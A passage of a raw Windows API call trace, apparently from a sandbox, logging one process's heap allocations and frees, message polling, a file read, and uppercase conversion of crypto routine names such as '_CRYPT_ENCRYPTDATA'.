lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.111] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.111] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.111] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.116] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0141.116] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0141.120] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x85aa, lpOverlapped=0x0) returned 1 [0141.122] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0141.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2f25018 [0141.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be6020 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0141.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0141.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2e80330 [0141.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0141.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2f25018 [0141.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0141.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0141.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0141.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0141.278] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0141.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0141.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2f25018 [0141.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0141.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0141.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0141.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0141.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2e988e8 [0141.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0141.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0141.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0141.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0141.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0141.287] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0141.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0141.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0141.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0141.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0141.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.290] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0141.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0141.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.291] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0141.291] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0141.292] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.292] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.292] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.292] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0141.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.293] 